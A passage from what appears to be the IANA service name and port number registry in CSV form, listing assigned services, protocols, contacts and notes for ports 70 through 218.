gopher,70,udp,Gopher,[Mark_McCahill],[Mark_McCahill],,,,,, netrjs-1,71,tcp,Remote Job Service,,,,,,,, netrjs-1,71,udp,Remote Job Service,,,,,,,, netrjs-2,72,tcp,Remote Job Service,,,,,,,, netrjs-2,72,udp,Remote Job Service,,,,,,,, netrjs-3,73,tcp,Remote Job Service,,,,,,,, netrjs-3,73,udp,Remote Job Service,,,,,,,, netrjs-4,74,tcp,Remote Job Service,[Bob_Braden],[Bob_Braden],,,,,, netrjs-4,74,udp,Remote Job Service,[Bob_Braden],[Bob_Braden],,,,,, ,75,tcp,any private dial out service,[Jon_Postel],[Jon_Postel],,,,,, ,75,udp,any private dial out service,[Jon_Postel],[Jon_Postel],,,,,, deos,76,tcp,Distributed External Object Store,[Robert_Ullmann],[Robert_Ullmann],,,,,, deos,76,udp,Distributed External Object Store,[Robert_Ullmann],[Robert_Ullmann],,,,,, ,77,tcp,any private RJE service,[Jon_Postel],[Jon_Postel],,,,,, ,77,udp,any private RJE service,[Jon_Postel],[Jon_Postel],,,,,, vettcp,78,tcp,vettcp,[Christopher_Leong],[Christopher_Leong],,,,,, vettcp,78,udp,vettcp,[Christopher_Leong],[Christopher_Leong],,,,,, finger,79,tcp,Finger,[David_Zimmerman],[David_Zimmerman],,,,,Unauthorized use by some mail users (see [RFC4146] for details), finger,79,udp,Finger,[David_Zimmerman],[David_Zimmerman],,,,,Unauthorized use by some mail users (see [RFC4146] for details), http,80,tcp,World Wide Web HTTP,,,,,,,,Defined TXT keys: u= p= path= http,80,udp,World Wide Web HTTP,,,,,,,,Defined TXT keys: u= p= path= www,80,tcp,World Wide Web HTTP,,,,,,,,"This is a duplicate of the ""http"" service and should not be used for discovery purposes." www,80,udp,World Wide Web HTTP,,,,,,,,"This is a duplicate of the ""http"" service and should not be used for discovery purposes." www-http,80,tcp,World Wide Web HTTP,[Tim_Berners_Lee],[Tim_Berners_Lee],,,,,,"This is a duplicate of the ""http"" service and should not be used for discovery purposes. u= p= path= (see txtrecords.html#http) Known Subtypes: _printer NOTE: The meaning of this service type, though called just ""http"", actually denotes something more precise than just ""any data transported using HTTP"". The DNS-SD service type ""http"" should only be used to advertise content that: * is served over HTTP, * can be displayed by ""typical"" web browser client software, and * is intented primarily to be viewed by a human user. Of course, the definition of ""typical web browser"" is subjective, and may change over time, but for practical purposes the DNS-SD service type ""http"" can be understood as meaning ""human-readable HTML content served over HTTP"". In some cases other widely-supported content types may also be appropriate, such as plain text over HTTP, or JPEG image over HTTP. Content types not intented primarily for viewing by a human user, or not widely-supported in web browsing clients, should not be advertised as DNS-SD service type ""http"", even if they do happen to be transported over HTTP. Such types should be advertised as their own logical service type with their own DNS-SD service type, for example, XUL (XML User Interface Language) transported over HTTP is advertised explicitly as DNS-SD service type ""xul-http""." www-http,80,udp,World Wide Web HTTP,[Tim_Berners_Lee],[Tim_Berners_Lee],,,,,,"This is a duplicate of the ""http"" service and should not be used for discovery purposes. u= p= path= (see txtrecords.html#http) Known Subtypes: _printer NOTE: The meaning of this service type, though called just ""http"", actually denotes something more precise than just ""any data transported using HTTP"". The DNS-SD service type ""http"" should only be used to advertise content that: * is served over HTTP, * can be displayed by ""typical"" web browser client software, and * is intented primarily to be viewed by a human user. Of course, the definition of ""typical web browser"" is subjective, and may change over time, but for practical purposes the DNS-SD service type ""http"" can be understood as meaning ""human-readable HTML content served over HTTP"". In some cases other widely-supported content types may also be appropriate, such as plain text over HTTP, or JPEG image over HTTP. Content types not intented primarily for viewing by a human user, or not widely-supported in web browsing clients, should not be advertised as DNS-SD service type ""http"", even if they do happen to be transported over HTTP. Such types should be advertised as their own logical service type with their own DNS-SD service type, for example, XUL (XML User Interface Language) transported over HTTP is advertised explicitly as DNS-SD service type ""xul-http""." http,80,sctp,HTTP,[Randall_Stewart],[Randall_Stewart],,,[RFC4960],,,Defined TXT keys: u= p= path= ,81,,Unassigned,,,,2007-09-06,,,, xfer,82,tcp,XFER Utility,[Thomas_M_Smith],[Thomas_M_Smith],,,,,, xfer,82,udp,XFER Utility,[Thomas_M_Smith],[Thomas_M_Smith],,,,,, mit-ml-dev,83,tcp,MIT ML Device,[David_Reed],[David_Reed],,,,,, mit-ml-dev,83,udp,MIT ML Device,[David_Reed],[David_Reed],,,,,, ctf,84,tcp,Common Trace Facility,[Hugh_Thomas],[Hugh_Thomas],,,,,, ctf,84,udp,Common Trace Facility,[Hugh_Thomas],[Hugh_Thomas],,,,,, mit-ml-dev,85,tcp,MIT ML Device,[David_Reed],[David_Reed],,,,,, mit-ml-dev,85,udp,MIT ML Device,[David_Reed],[David_Reed],,,,,, mfcobol,86,tcp,Micro Focus Cobol,[Simon_Edwards],[Simon_Edwards],,,,,, mfcobol,86,udp,Micro Focus Cobol,[Simon_Edwards],[Simon_Edwards],,,,,, ,87,tcp,any private terminal link,[Jon_Postel],[Jon_Postel],,,,,, ,87,udp,any private terminal link,[Jon_Postel],[Jon_Postel],,,,,, kerberos,88,tcp,Kerberos,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, kerberos,88,udp,Kerberos,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, su-mit-tg,89,tcp,SU/MIT Telnet Gateway,[Mark_Crispin],[Mark_Crispin],,,,,, su-mit-tg,89,udp,SU/MIT Telnet Gateway,[Mark_Crispin],[Mark_Crispin],,,,,, dnsix,90,tcp,DNSIX Securit Attribute Token Map,[Charles_Watt],[Charles_Watt],,,,,PORT 90 also being used unofficially by Pointcast, dnsix,90,udp,DNSIX Securit Attribute Token Map,[Charles_Watt],[Charles_Watt],,,,,PORT 90 also being used unofficially by Pointcast, mit-dov,91,tcp,MIT Dover Spooler,[Eliot_Moss],[Eliot_Moss],,,,,, mit-dov,91,udp,MIT Dover Spooler,[Eliot_Moss],[Eliot_Moss],,,,,, npp,92,tcp,Network Printing Protocol,[Louis_Mamakos],[Louis_Mamakos],,,,,, npp,92,udp,Network Printing Protocol,[Louis_Mamakos],[Louis_Mamakos],,,,,, dcp,93,tcp,Device Control Protocol,[Daniel_Tappan],[Daniel_Tappan],,,,,, dcp,93,udp,Device Control Protocol,[Daniel_Tappan],[Daniel_Tappan],,,,,, objcall,94,tcp,Tivoli Object Dispatcher,[Tom_Bereiter],[Tom_Bereiter],,,,,, objcall,94,udp,Tivoli Object Dispatcher,[Tom_Bereiter],[Tom_Bereiter],,,,,, supdup,95,tcp,SUPDUP,[Mark_Crispin],[Mark_Crispin],,,,,, supdup,95,udp,SUPDUP,[Mark_Crispin],[Mark_Crispin],,,,,, dixie,96,tcp,DIXIE Protocol Specification,[Tim_Howes],[Tim_Howes],,,,,, dixie,96,udp,DIXIE Protocol Specification,[Tim_Howes],[Tim_Howes],,,,,, swift-rvf,97,tcp,Swift Remote Virtural File Protocol,[Maurice_R_Turcotte],[Maurice_R_Turcotte],,,,,, swift-rvf,97,udp,Swift Remote Virtural File Protocol,[Maurice_R_Turcotte],[Maurice_R_Turcotte],,,,,, tacnews,98,tcp,TAC News,[Jon_Postel],[Jon_Postel],,,,,, tacnews,98,udp,TAC News,[Jon_Postel],[Jon_Postel],,,,,, metagram,99,tcp,Metagram Relay,[Geoff_Goodfellow],[Geoff_Goodfellow],,,,,, metagram,99,udp,Metagram Relay,[Geoff_Goodfellow],[Geoff_Goodfellow],,,,,, ,100,,Unassigned,,,,2012-03-21,,,Known Unauthorized Use on 100, hostname,101,tcp,NIC Host Name Server,[Jon_Postel],[Jon_Postel],,,,,, hostname,101,udp,NIC Host Name Server,[Jon_Postel],[Jon_Postel],,,,,, iso-tsap,102,tcp,ISO-TSAP Class 0,[Marshall_Rose],[Marshall_Rose],,,,,, iso-tsap,102,udp,ISO-TSAP Class 0,[Marshall_Rose],[Marshall_Rose],,,,,, gppitnp,103,tcp,Genesis Point-to-Point Trans Net,,,,,,,, gppitnp,103,udp,Genesis Point-to-Point Trans Net,,,,,,,, acr-nema,104,tcp,ACR-NEMA Digital Imag. & Comm. 300,[Patrick_McNamee],[Patrick_McNamee],,,,,, acr-nema,104,udp,ACR-NEMA Digital Imag. & Comm. 300,[Patrick_McNamee],[Patrick_McNamee],,,,,, cso,105,tcp,CCSO name server protocol,[Martin_Hamilton],[Martin_Hamilton],,,,,, cso,105,udp,CCSO name server protocol,[Martin_Hamilton],[Martin_Hamilton],,,,,, csnet-ns,105,tcp,Mailbox Name Nameserver,[Marvin_Solomon],[Marvin_Solomon],,,,,, csnet-ns,105,udp,Mailbox Name Nameserver,[Marvin_Solomon],[Marvin_Solomon],,,,,, 3com-tsmux,106,tcp,3COM-TSMUX,[Jeremy_Siegel],[Jeremy_Siegel],,,,,Known Unauthorized Use on 106, 3com-tsmux,106,udp,3COM-TSMUX,[Jeremy_Siegel],[Jeremy_Siegel],,,,,Known Unauthorized Use on 106, rtelnet,107,tcp,Remote Telnet Service,[Jon_Postel],[Jon_Postel],,,,,, rtelnet,107,udp,Remote Telnet Service,[Jon_Postel],[Jon_Postel],,,,,, snagas,108,tcp,SNA Gateway Access Server,[Kevin_Murphy],[Kevin_Murphy],,,,,, snagas,108,udp,SNA Gateway Access Server,[Kevin_Murphy],[Kevin_Murphy],,,,,, pop2,109,tcp,Post Office Protocol - Version 2,[Joyce_K_Reynolds],[Joyce_K_Reynolds],,,,,, pop2,109,udp,Post Office Protocol - Version 2,[Joyce_K_Reynolds],[Joyce_K_Reynolds],,,,,, pop3,110,tcp,Post Office Protocol - Version 3,[Marshall_Rose],[Marshall_Rose],,,,,, pop3,110,udp,Post Office Protocol - Version 3,[Marshall_Rose],[Marshall_Rose],,,,,, sunrpc,111,tcp,SUN Remote Procedure Call,[Chuck_McManis],[Chuck_McManis],,,,,, sunrpc,111,udp,SUN Remote Procedure Call,[Chuck_McManis],[Chuck_McManis],,,,,, mcidas,112,tcp,McIDAS Data Transmission Protocol,[Glenn_Davis],[Glenn_Davis],,,,,, mcidas,112,udp,McIDAS Data Transmission Protocol,[Glenn_Davis],[Glenn_Davis],,,,,, ident,113,tcp,,,,,,,,, auth,113,tcp,Authentication Service,[Mike_St_Johns],[Mike_St_Johns],,,,,, auth,113,udp,Authentication Service,[Mike_St_Johns],[Mike_St_Johns],,,,,, ,114,,unassigned,,,,,,,,Deprecated June 2004 sftp,115,tcp,Simple File Transfer Protocol,[Mark_Lottor],[Mark_Lottor],,,,,, sftp,115,udp,Simple File Transfer Protocol,[Mark_Lottor],[Mark_Lottor],,,,,, ansanotify,116,tcp,ANSA REX Notify,[Nicola_J_Howarth],[Nicola_J_Howarth],,,,,, ansanotify,116,udp,ANSA REX Notify,[Nicola_J_Howarth],[Nicola_J_Howarth],,,,,, uucp-path,117,tcp,UUCP Path Service,,,,,,,, uucp-path,117,udp,UUCP Path Service,,,,,,,, sqlserv,118,tcp,SQL Services,[Larry_Barnes],[Larry_Barnes],,,,,, sqlserv,118,udp,SQL Services,[Larry_Barnes],[Larry_Barnes],,,,,, nntp,119,tcp,Network News Transfer Protocol,[Phil_Lapsley],[Phil_Lapsley],,,,,, nntp,119,udp,Network News Transfer Protocol,[Phil_Lapsley],[Phil_Lapsley],,,,,, cfdptkt,120,tcp,CFDPTKT,[John_Ioannidis],[John_Ioannidis],,,,,, cfdptkt,120,udp,CFDPTKT,[John_Ioannidis],[John_Ioannidis],,,,,, erpc,121,tcp,Encore Expedited Remote Pro.Call,[Jack_ONeil],[Jack_ONeil],,,,,, erpc,121,udp,Encore Expedited Remote Pro.Call,[Jack_ONeil],[Jack_ONeil],,,,,, smakynet,122,tcp,SMAKYNET,[Pierre_Arnaud],[Pierre_Arnaud],,,,,, smakynet,122,udp,SMAKYNET,[Pierre_Arnaud],[Pierre_Arnaud],,,,,, ntp,123,tcp,Network Time Protocol,[Dave_Mills],[Dave_Mills],,,[RFC5905],,, ntp,123,udp,Network Time Protocol,[Dave_Mills],[Dave_Mills],,,[RFC5905],,, ansatrader,124,tcp,ANSA REX Trader,[Nicola_J_Howarth],[Nicola_J_Howarth],,,,,, ansatrader,124,udp,ANSA REX Trader,[Nicola_J_Howarth],[Nicola_J_Howarth],,,,,, locus-map,125,tcp,Locus PC-Interface Net Map Ser,[Eric_Peterson],[Eric_Peterson],,,,,, locus-map,125,udp,Locus PC-Interface Net Map Ser,[Eric_Peterson],[Eric_Peterson],,,,,, nxedit,126,tcp,NXEdit,[Don_Payette],[Don_Payette],,,,,,"Port 126 Previously assigned to application below unitary 126/tcp Unisys Unitary Login unitary 126/udp Unisys Unitary Login Port 126 Previously assigned to application above" nxedit,126,udp,NXEdit,[Don_Payette],[Don_Payette],,,,,,"Port 126 Previously assigned to application below unitary 126/tcp Unisys Unitary Login unitary 126/udp Unisys Unitary Login Port 126 Previously assigned to application above" locus-con,127,tcp,Locus PC-Interface Conn Server,[Eric_Peterson],[Eric_Peterson],,,,,, locus-con,127,udp,Locus PC-Interface Conn Server,[Eric_Peterson],[Eric_Peterson],,,,,, gss-xlicen,128,tcp,GSS X License Verification,[John_Light],[John_Light],,,,,, gss-xlicen,128,udp,GSS X License Verification,[John_Light],[John_Light],,,,,, pwdgen,129,tcp,Password Generator Protocol,[Frank_J_Wacho],[Frank_J_Wacho],,,,,, pwdgen,129,udp,Password Generator Protocol,[Frank_J_Wacho],[Frank_J_Wacho],,,,,, cisco-fna,130,tcp,cisco FNATIVE,,,,,,,, cisco-fna,130,udp,cisco FNATIVE,,,,,,,, cisco-tna,131,tcp,cisco TNATIVE,,,,,,,, cisco-tna,131,udp,cisco TNATIVE,,,,,,,, cisco-sys,132,tcp,cisco SYSMAINT,,,,,,,, cisco-sys,132,udp,cisco SYSMAINT,,,,,,,, statsrv,133,tcp,Statistics Service,[Dave_Mills_2],[Dave_Mills_2],,,,,, statsrv,133,udp,Statistics Service,[Dave_Mills_2],[Dave_Mills_2],,,,,, ingres-net,134,tcp,INGRES-NET Service,[Mike_Berrow],[Mike_Berrow],,,,,, ingres-net,134,udp,INGRES-NET Service,[Mike_Berrow],[Mike_Berrow],,,,,, epmap,135,tcp,DCE endpoint resolution,[Joe_Pato],[Joe_Pato],,,,,, epmap,135,udp,DCE endpoint resolution,[Joe_Pato],[Joe_Pato],,,,,, profile,136,tcp,PROFILE Naming System,[Larry_Peterson],[Larry_Peterson],,,,,, profile,136,udp,PROFILE Naming System,[Larry_Peterson],[Larry_Peterson],,,,,, netbios-ns,137,tcp,NETBIOS Name Service,,,,,,,, netbios-ns,137,udp,NETBIOS Name Service,,,,,,,, netbios-dgm,138,tcp,NETBIOS Datagram Service,,,,,,,, netbios-dgm,138,udp,NETBIOS Datagram Service,,,,,,,, netbios-ssn,139,tcp,NETBIOS Session Service,[Jon_Postel],[Jon_Postel],,,,,, netbios-ssn,139,udp,NETBIOS Session Service,[Jon_Postel],[Jon_Postel],,,,,, emfis-data,140,tcp,EMFIS Data Service,,,,,,,, emfis-data,140,udp,EMFIS Data Service,,,,,,,, emfis-cntl,141,tcp,EMFIS Control Service,[Gerd_Beling],[Gerd_Beling],,,,,, emfis-cntl,141,udp,EMFIS Control Service,[Gerd_Beling],[Gerd_Beling],,,,,, bl-idm,142,tcp,Britton-Lee IDM,[Susie_Snitzer],[Susie_Snitzer],,,,,, bl-idm,142,udp,Britton-Lee IDM,[Susie_Snitzer],[Susie_Snitzer],,,,,, imap,143,tcp,Internet Message Access Protocol,[Mark_Crispin_2],[Mark_Crispin_2],,,,,, imap,143,udp,Internet Message Access Protocol,[Mark_Crispin_2],[Mark_Crispin_2],,,,,, uma,144,tcp,Universal Management Architecture,[Jay_Whitney],[Jay_Whitney],,,,,, uma,144,udp,Universal Management Architecture,[Jay_Whitney],[Jay_Whitney],,,,,, uaac,145,tcp,UAAC Protocol,[David_A_Gomberg],[David_A_Gomberg],,,,,, uaac,145,udp,UAAC Protocol,[David_A_Gomberg],[David_A_Gomberg],,,,,, iso-tp0,146,tcp,ISO-IP0,,,,,,,, iso-tp0,146,udp,ISO-IP0,,,,,,,, iso-ip,147,tcp,ISO-IP,[Marshall_Rose],[Marshall_Rose],,,,,, iso-ip,147,udp,ISO-IP,[Marshall_Rose],[Marshall_Rose],,,,,, jargon,148,tcp,Jargon,[Bill_Weinman],[Bill_Weinman],,,,,, jargon,148,udp,Jargon,[Bill_Weinman],[Bill_Weinman],,,,,, aed-512,149,tcp,AED 512 Emulation Service,[Albert_G_Broscius],[Albert_G_Broscius],,,,,, aed-512,149,udp,AED 512 Emulation Service,[Albert_G_Broscius],[Albert_G_Broscius],,,,,, sql-net,150,tcp,SQL-NET,[Martin_Picard],[Martin_Picard],,,,,, sql-net,150,udp,SQL-NET,[Martin_Picard],[Martin_Picard],,,,,, hems,151,tcp,HEMS,,,,,,,, hems,151,udp,HEMS,,,,,,,, bftp,152,tcp,Background File Transfer Program,[Annette_DeSchon],[Annette_DeSchon],,,,,, bftp,152,udp,Background File Transfer Program,[Annette_DeSchon],[Annette_DeSchon],,,,,, sgmp,153,tcp,SGMP,[Marty_Schoffstahl],[Marty_Schoffstahl],,,,,, sgmp,153,udp,SGMP,[Marty_Schoffstahl],[Marty_Schoffstahl],,,,,, netsc-prod,154,tcp,NETSC,,,,,,,, netsc-prod,154,udp,NETSC,,,,,,,, netsc-dev,155,tcp,NETSC,[Sergio_Heker],[Sergio_Heker],,,,,, netsc-dev,155,udp,NETSC,[Sergio_Heker],[Sergio_Heker],,,,,, sqlsrv,156,tcp,SQL Service,[Craig_Rogers],[Craig_Rogers],,,,,, sqlsrv,156,udp,SQL Service,[Craig_Rogers],[Craig_Rogers],,,,,, knet-cmp,157,tcp,KNET/VM Command/Message Protocol,[Gary_S_Malkin],[Gary_S_Malkin],,,,,, knet-cmp,157,udp,KNET/VM Command/Message Protocol,[Gary_S_Malkin],[Gary_S_Malkin],,,,,, pcmail-srv,158,tcp,PCMail Server,[Mark_L_Lambert],[Mark_L_Lambert],,,,,, pcmail-srv,158,udp,PCMail Server,[Mark_L_Lambert],[Mark_L_Lambert],,,,,, nss-routing,159,tcp,NSS-Routing,[Yakov_Rekhter],[Yakov_Rekhter],,,,,, nss-routing,159,udp,NSS-Routing,[Yakov_Rekhter],[Yakov_Rekhter],,,,,, sgmp-traps,160,tcp,SGMP-TRAPS,[Marty_Schoffstahl],[Marty_Schoffstahl],,,,,, sgmp-traps,160,udp,SGMP-TRAPS,[Marty_Schoffstahl],[Marty_Schoffstahl],,,,,, snmp,161,tcp,SNMP,,,,,,,, snmp,161,udp,SNMP,,,,,,,, snmptrap,162,tcp,SNMPTRAP,[Marshall_Rose],[Marshall_Rose],,,,,, snmptrap,162,udp,SNMPTRAP,[Marshall_Rose],[Marshall_Rose],,,,,, cmip-man,163,tcp,CMIP/TCP Manager,,,,,,,, cmip-man,163,udp,CMIP/TCP Manager,,,,,,,, cmip-agent,164,tcp,CMIP/TCP Agent,[Amatzia_Ben_Artzi],[Amatzia_Ben_Artzi],,,,,, cmip-agent,164,udp,CMIP/TCP Agent,[Amatzia_Ben_Artzi],[Amatzia_Ben_Artzi],,,,,, xns-courier,165,tcp,Xerox,[Susie_Armstrong_2],[Susie_Armstrong_2],,,,,, xns-courier,165,udp,Xerox,[Susie_Armstrong_2],[Susie_Armstrong_2],,,,,, s-net,166,tcp,Sirius Systems,[Brian_Lloyd],[Brian_Lloyd],,,,,, s-net,166,udp,Sirius Systems,[Brian_Lloyd],[Brian_Lloyd],,,,,, namp,167,tcp,NAMP,[Marty_Schoffstahl],[Marty_Schoffstahl],,,,,, namp,167,udp,NAMP,[Marty_Schoffstahl],[Marty_Schoffstahl],,,,,, rsvd,168,tcp,RSVD,[Alan_Sandell],[Alan_Sandell],,2008-05-01,,,, rsvd,168,udp,RSVD,[Alan_Sandell],[Alan_Sandell],,2008-05-01,,,, send,169,tcp,SEND,[William_Oldwin],[William_Oldwin],,2013-06-17,,,, send,169,udp,SEND,[William_Oldwin],[William_Oldwin],,2013-06-17,,,, print-srv,170,tcp,Network PostScript,[Brian_Reid],[Brian_Reid],,,,,, print-srv,170,udp,Network PostScript,[Brian_Reid],[Brian_Reid],,,,,, multiplex,171,tcp,Network Innovations Multiplex,,,,,,,, multiplex,171,udp,Network Innovations Multiplex,,,,,,,, cl-1,172,tcp,"Network Innovations CL/1 IANA assigned this well-formed service name as a replacement for ""cl/1"".",[Kevin_DeVault],[Kevin_DeVault],,,,,, cl/1,172,tcp,Network Innovations CL/1,[Kevin_DeVault],[Kevin_DeVault],,,,,,"This entry is an alias to ""cl-1"". This entry is now historic, not usable for use with many common service discovery mechanisms." cl-1,172,udp,"Network Innovations CL/1 IANA assigned this well-formed service name as a replacement for ""cl/1"".",[Kevin_DeVault],[Kevin_DeVault],,,,,, cl/1,172,udp,Network Innovations CL/1,[Kevin_DeVault],[Kevin_DeVault],,,,,,"This entry is an alias to ""cl-1"". This entry is now historic, not usable for use with many common service discovery mechanisms." xyplex-mux,173,tcp,Xyplex,[Bob_Stewart],[Bob_Stewart],,,,,, xyplex-mux,173,udp,Xyplex,[Bob_Stewart],[Bob_Stewart],,,,,, mailq,174,tcp,MAILQ,[Rayan_Zachariassen],[Rayan_Zachariassen],,,,,, mailq,174,udp,MAILQ,[Rayan_Zachariassen],[Rayan_Zachariassen],,,,,, vmnet,175,tcp,VMNET,[Christopher_Tengi],[Christopher_Tengi],,,,,, vmnet,175,udp,VMNET,[Christopher_Tengi],[Christopher_Tengi],,,,,, genrad-mux,176,tcp,GENRAD-MUX,[Ron_Thornton],[Ron_Thornton],,,,,, genrad-mux,176,udp,GENRAD-MUX,[Ron_Thornton],[Ron_Thornton],,,,,, xdmcp,177,tcp,X Display Manager Control Protocol,[Robert_W_Scheifler],[Robert_W_Scheifler],,,,,, xdmcp,177,udp,X Display Manager Control Protocol,[Robert_W_Scheifler],[Robert_W_Scheifler],,,,,, nextstep,178,tcp,NextStep Window Server,[Leo_Hourvitz],[Leo_Hourvitz],,,,,, nextstep,178,udp,NextStep Window Server,[Leo_Hourvitz],[Leo_Hourvitz],,,,,, bgp,179,tcp,Border Gateway Protocol,[Kirk_Lougheed],[Kirk_Lougheed],,,,,, bgp,179,udp,Border Gateway Protocol,[Kirk_Lougheed],[Kirk_Lougheed],,,,,, bgp,179,sctp,BGP,[Randall_Stewart],[Randall_Stewart],,,[RFC4960],,, ris,180,tcp,Intergraph,[Dave_Buehmann],[Dave_Buehmann],,,,,, ris,180,udp,Intergraph,[Dave_Buehmann],[Dave_Buehmann],,,,,, unify,181,tcp,Unify,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, unify,181,udp,Unify,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, audit,182,tcp,Unisys Audit SITP,[Gil_Greenbaum],[Gil_Greenbaum],,,,,, audit,182,udp,Unisys Audit SITP,[Gil_Greenbaum],[Gil_Greenbaum],,,,,, ocbinder,183,tcp,OCBinder,,,,,,,, ocbinder,183,udp,OCBinder,,,,,,,, ocserver,184,tcp,OCServer,[Jerrilynn_Okamura],[Jerrilynn_Okamura],,,,,, ocserver,184,udp,OCServer,[Jerrilynn_Okamura],[Jerrilynn_Okamura],,,,,, remote-kis,185,tcp,Remote-KIS,,,,,,,, remote-kis,185,udp,Remote-KIS,,,,,,,, kis,186,tcp,KIS Protocol,[Ralph_Droms],[Ralph_Droms],,,,,, kis,186,udp,KIS Protocol,[Ralph_Droms],[Ralph_Droms],,,,,, aci,187,tcp,Application Communication Interface,[Rick_Carlos],[Rick_Carlos],,,,,, aci,187,udp,Application Communication Interface,[Rick_Carlos],[Rick_Carlos],,,,,, mumps,188,tcp,Plus Five's MUMPS,[Hokey_Stenn],[Hokey_Stenn],,,,,, mumps,188,udp,Plus Five's MUMPS,[Hokey_Stenn],[Hokey_Stenn],,,,,, qft,189,tcp,Queued File Transport,[Wayne_Schroeder],[Wayne_Schroeder],,,,,, qft,189,udp,Queued File Transport,[Wayne_Schroeder],[Wayne_Schroeder],,,,,, gacp,190,tcp,Gateway Access Control Protocol,[C_Philip_Wood],[C_Philip_Wood],,,,,, gacp,190,udp,Gateway Access Control Protocol,[C_Philip_Wood],[C_Philip_Wood],,,,,, prospero,191,tcp,Prospero Directory Service,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, prospero,191,udp,Prospero Directory Service,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, osu-nms,192,tcp,OSU Network Monitoring System,[Doug_Karl],[Doug_Karl],,,,,, osu-nms,192,udp,OSU Network Monitoring System,[Doug_Karl],[Doug_Karl],,,,,, srmp,193,tcp,Spider Remote Monitoring Protocol,[Ted_J_Socolofsky],[Ted_J_Socolofsky],,,,,, srmp,193,udp,Spider Remote Monitoring Protocol,[Ted_J_Socolofsky],[Ted_J_Socolofsky],,,,,, irc,194,tcp,Internet Relay Chat Protocol,[Jarkko_Oikarinen],[Jarkko_Oikarinen],,,,,, irc,194,udp,Internet Relay Chat Protocol,[Jarkko_Oikarinen],[Jarkko_Oikarinen],,,,,, dn6-nlm-aud,195,tcp,DNSIX Network Level Module Audit,,,,,,,, dn6-nlm-aud,195,udp,DNSIX Network Level Module Audit,,,,,,,, dn6-smm-red,196,tcp,DNSIX Session Mgt Module Audit Redir,[Lawrence_Lebahn],[Lawrence_Lebahn],,,,,, dn6-smm-red,196,udp,DNSIX Session Mgt Module Audit Redir,[Lawrence_Lebahn],[Lawrence_Lebahn],,,,,, dls,197,tcp,Directory Location Service,,,,,,,, dls,197,udp,Directory Location Service,,,,,,,, dls-mon,198,tcp,Directory Location Service Monitor,[Scott_Bellew],[Scott_Bellew],,,,,, dls-mon,198,udp,Directory Location Service Monitor,[Scott_Bellew],[Scott_Bellew],,,,,, smux,199,tcp,SMUX,[Marshall_Rose],[Marshall_Rose],,,,,, smux,199,udp,SMUX,[Marshall_Rose],[Marshall_Rose],,,,,, src,200,tcp,IBM System Resource Controller,[Gerald_McBrearty],[Gerald_McBrearty],,,,,, src,200,udp,IBM System Resource Controller,[Gerald_McBrearty],[Gerald_McBrearty],,,,,, at-rtmp,201,tcp,AppleTalk Routing Maintenance,,,,,,,, at-rtmp,201,udp,AppleTalk Routing Maintenance,,,,,,,, at-nbp,202,tcp,AppleTalk Name Binding,,,,,,,, at-nbp,202,udp,AppleTalk Name Binding,,,,,,,, at-3,203,tcp,AppleTalk Unused,,,,,,,, at-3,203,udp,AppleTalk Unused,,,,,,,, at-echo,204,tcp,AppleTalk Echo,,,,,,,, at-echo,204,udp,AppleTalk Echo,,,,,,,, at-5,205,tcp,AppleTalk Unused,,,,,,,, at-5,205,udp,AppleTalk Unused,,,,,,,, at-zis,206,tcp,AppleTalk Zone Information,,,,,,,, at-zis,206,udp,AppleTalk Zone Information,,,,,,,, at-7,207,tcp,AppleTalk Unused,,,,,,,, at-7,207,udp,AppleTalk Unused,,,,,,,, at-8,208,tcp,AppleTalk Unused,[Rob_Chandhok],[Rob_Chandhok],,,,,, at-8,208,udp,AppleTalk Unused,[Rob_Chandhok],[Rob_Chandhok],,,,,, qmtp,209,tcp,The Quick Mail Transfer Protocol,[Dan_Bernstein],[Dan_Bernstein],,,,,, qmtp,209,udp,The Quick Mail Transfer Protocol,[Dan_Bernstein],[Dan_Bernstein],,,,,, z39-50,210,tcp,"ANSI Z39.50 IANA assigned this well-formed service name as a replacement for ""z39.50"".",[Mark_H_Needleman],[Mark_H_Needleman],,,,,, z39.50,210,tcp,ANSI Z39.50,[Mark_H_Needleman],[Mark_H_Needleman],,,,,,"This entry is an alias to ""z39-50"". This entry is now historic, not usable for use with many common service discovery mechanisms." z39-50,210,udp,"ANSI Z39.50 IANA assigned this well-formed service name as a replacement for ""z39.50"".",[Mark_H_Needleman],[Mark_H_Needleman],,,,,, z39.50,210,udp,ANSI Z39.50,[Mark_H_Needleman],[Mark_H_Needleman],,,,,,"This entry is an alias to ""z39-50"". This entry is now historic, not usable for use with many common service discovery mechanisms." 914c-g,211,tcp,"Texas Instruments 914C/G Terminal IANA assigned this well-formed service name as a replacement for ""914c/g"".",[Bill_Harrell],[Bill_Harrell],,,,,, 914c/g,211,tcp,Texas Instruments 914C/G Terminal,[Bill_Harrell],[Bill_Harrell],,,,,,"This entry is an alias to ""914c-g"". This entry is now historic, not usable for use with many common service discovery mechanisms." 914c-g,211,udp,"Texas Instruments 914C/G Terminal IANA assigned this well-formed service name as a replacement for ""914c/g"".",[Bill_Harrell],[Bill_Harrell],,,,,, 914c/g,211,udp,Texas Instruments 914C/G Terminal,[Bill_Harrell],[Bill_Harrell],,,,,,"This entry is an alias to ""914c-g"". This entry is now historic, not usable for use with many common service discovery mechanisms." anet,212,tcp,ATEXSSTR,[Jim_Taylor],[Jim_Taylor],,,,,, anet,212,udp,ATEXSSTR,[Jim_Taylor],[Jim_Taylor],,,,,, ipx,213,tcp,IPX,[Don_Provan],[Don_Provan],,,,,, ipx,213,udp,IPX,[Don_Provan],[Don_Provan],,,,,, vmpwscs,214,tcp,VM PWSCS,[Dan_Shia],[Dan_Shia],,,,,, vmpwscs,214,udp,VM PWSCS,[Dan_Shia],[Dan_Shia],,,,,, softpc,215,tcp,Insignia Solutions,[Martyn_Thomas],[Martyn_Thomas],,,,,, softpc,215,udp,Insignia Solutions,[Martyn_Thomas],[Martyn_Thomas],,,,,, CAIlic,216,tcp,Computer Associates Int'l License Server,[Chuck_Spitz],[Chuck_Spitz],,,,,, CAIlic,216,udp,Computer Associates Int'l License Server,[Chuck_Spitz],[Chuck_Spitz],,,,,, dbase,217,tcp,dBASE Unix,[Don_Gibson],[Don_Gibson],,,,,, dbase,217,udp,dBASE Unix,[Don_Gibson],[Don_Gibson],,,,,, mpp,218,tcp,Netix Message Posting Protocol,[Shannon_Yeh],[Shannon_Yeh],,,,,, mpp,218,udp,Netix Message Posting Protocol,[Shannon_Yeh],[Shannon_Yeh],,,,,, 